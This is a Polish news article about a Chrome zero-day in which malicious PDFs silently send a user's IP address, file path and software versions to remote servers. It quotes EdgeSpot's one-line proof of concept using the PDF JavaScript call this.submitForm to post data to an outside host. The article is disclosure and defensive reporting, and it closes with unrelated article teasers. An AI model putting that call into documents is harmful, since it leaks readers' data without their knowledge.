Luka w Chrome pozwala hakerom zbierać dane użytkownika za pomocą plików pdf
Spisu treści:
Wideo: How to fix Google Chrome Starting error "chrome.exe - Bad Image" | Error Status 0xc0000020 2024
Usługa wykrywania exploitów EdgeSpot odkrył intrygującą lukę Chrome zero-day wykorzystującą dokumenty PDF. Luka umożliwia atakującym przechwytywanie poufnych danych przy użyciu złośliwych dokumentów PDF otwieranych w Chrome.
Gdy tylko ofiara otworzy odpowiednie pliki PDF w Google Chrome, szkodliwy program zaczyna działać w tle, zbierając dane użytkownika.
Dane są następnie przekazywane do zdalnego serwera, który jest kontrolowany przez hakerów. Być może zastanawiasz się, jakie dane są zasysane przez osoby atakujące, atakują one następujące dane na twoim komputerze:
- adres IP
- Pełna ścieżka do pliku PDF w systemie
- Wersje na system operacyjny i Chrome
Uważaj na pliki PDF chronione przez złośliwe oprogramowanie
Możesz być zaskoczony, że nic się nie dzieje, gdy do otwierania plików PDF używany jest program Adobe Reader. Ponadto żądania HTTP POST służą do przesyłania danych na zdalne serwery bez interwencji użytkownika.
Eksperci zauważyli, że jedna z dwóch domen readnotifycom lub burpcollaboratornet otrzymuje dane.
Możesz wyobrazić sobie intensywność ataku, biorąc pod uwagę fakt, że większość oprogramowania antywirusowego nie jest w stanie wykryć próbek wykrytych przez EdgeSpot.
Eksperci ujawniają, że osoby atakujące używają interfejsu API JavaScript „this.submitForm ()” JavaScript do gromadzenia poufnych informacji użytkowników.
Przetestowaliśmy go z minimalnym PoC, proste wywołanie API takie jak „this.submitForm („ http://google.com/test ”)” sprawi, że Google Chrome wyśle dane osobowe na google.com.
Eksperci faktycznie dowiedzieli się, że ten błąd przeglądarki Chrome był wykorzystywany przez dwa różne zestawy złośliwych plików PDF. Oba zostały rozpowszechnione odpowiednio w październiku 2017 r. I wrześniu 2018 r.
Zebrane dane mogą być w szczególności wykorzystane przez atakujących w celu dostrajania ataków w przyszłości. Raporty sugerują, że pierwsza partia plików została skompilowana przy użyciu usługi śledzenia PDF ReadNotify.
Użytkownicy mogą korzystać z usługi, aby śledzić widoki użytkowników. EdgeSpot nie udostępnił żadnych szczegółów dotyczących charakteru drugiego zestawu plików PDF.
Jak zachować ochronę
Usługa wykrywania luk w zabezpieczeniach EdgeSpot chciała ostrzec użytkowników Chrome o potencjalnych zagrożeniach, ponieważ łata nie zostanie wydana w najbliższej przyszłości.
EdgeSpot poinformował Google o luce w zeszłym roku, a firma obiecała opublikować łatę pod koniec kwietnia. H.
Można jednak rozważyć tymczasowe obejście problemu, wyświetlając lokalnie odebrane dokumenty PDF za pomocą alternatywnej aplikacji do odczytu plików PDF.
Możesz także otworzyć dokumenty PDF w Chrome, odłączając swoje systemy od Internetu. Tymczasem możesz poczekać na aktualizację Chrome 74, która ma zostać wprowadzona 23 kwietnia.
Interfejs użytkownika poświadczeń w systemie Windows 10 pozwala teraz wkleić nazwę użytkownika i hasło
Kompilacja 14342 systemu Windows 10 ułatwia uwierzytelnianie. Interfejs użytkownika poświadczeń został zaktualizowany o obsługę wklejania w polach nazwy użytkownika i hasła. Jest to bardzo przydatna funkcja, szczególnie jeśli używasz dość złożonej nazwy użytkownika lub hasła. Są też użytkownicy, którzy po prostu nie pamiętają swoich haseł lub też mają…
Firefox Mozilla chce zbierać dane do przeglądania w celu „badań”
Mozilla Firefox zastanawia się nad pomysłem gromadzenia prywatnych danych przeglądania, aby wspomóc swoje badania. Firma zapewnia, że będzie to opcja opcjonalna.
Luka w serwerze MS Exchange daje hakerom uprawnienia administratora
W Microsoft Exchange Server 2013, 2016 i 2019 została odkryta nowa podatność. Nowa luka nazywa się PrivExchange.